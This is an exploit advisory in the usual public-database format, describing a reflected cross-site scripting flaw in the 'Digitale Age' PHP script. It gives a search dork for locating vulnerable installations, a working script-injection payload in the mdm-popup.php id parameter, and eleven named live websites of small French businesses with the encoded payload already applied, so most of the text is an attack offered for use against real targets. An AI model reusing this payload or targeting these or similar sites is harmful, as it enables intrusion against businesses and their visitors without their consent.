# Exploit Title: Digitale Age scripte Remote XSS/FPD Vulnerabilities
# Date: 05/10/2012
# Author: The Black Devils
# Software Link: http://www.digitalage.fr/
# Category : [ webapps ]
# Dork : Fabriqué par: Safe & Web Company (((( Digital Age ))))
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http:\Localhost\[Path]\mdm-popup.php?id='"><script>alert(1337);</script>'
proof image http://oi50.tinypic.com/k351f9.jpg
-------------------------------
# Demo site:
http://www.assurances-guillaume.com/mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.dba-demenagement-41.com/mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.dp-toiture.com/mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.cheminements.fr/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.fauchere-immobilier.com/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.alegra.pro/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.chezantoine.fr/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.cofrasud.com/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.cliniquedumobile.fr/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://ema-coiffure-78.com/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.hotel-restaurant-ledamius.com/mdm-popup.php?id=mdm-popup.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information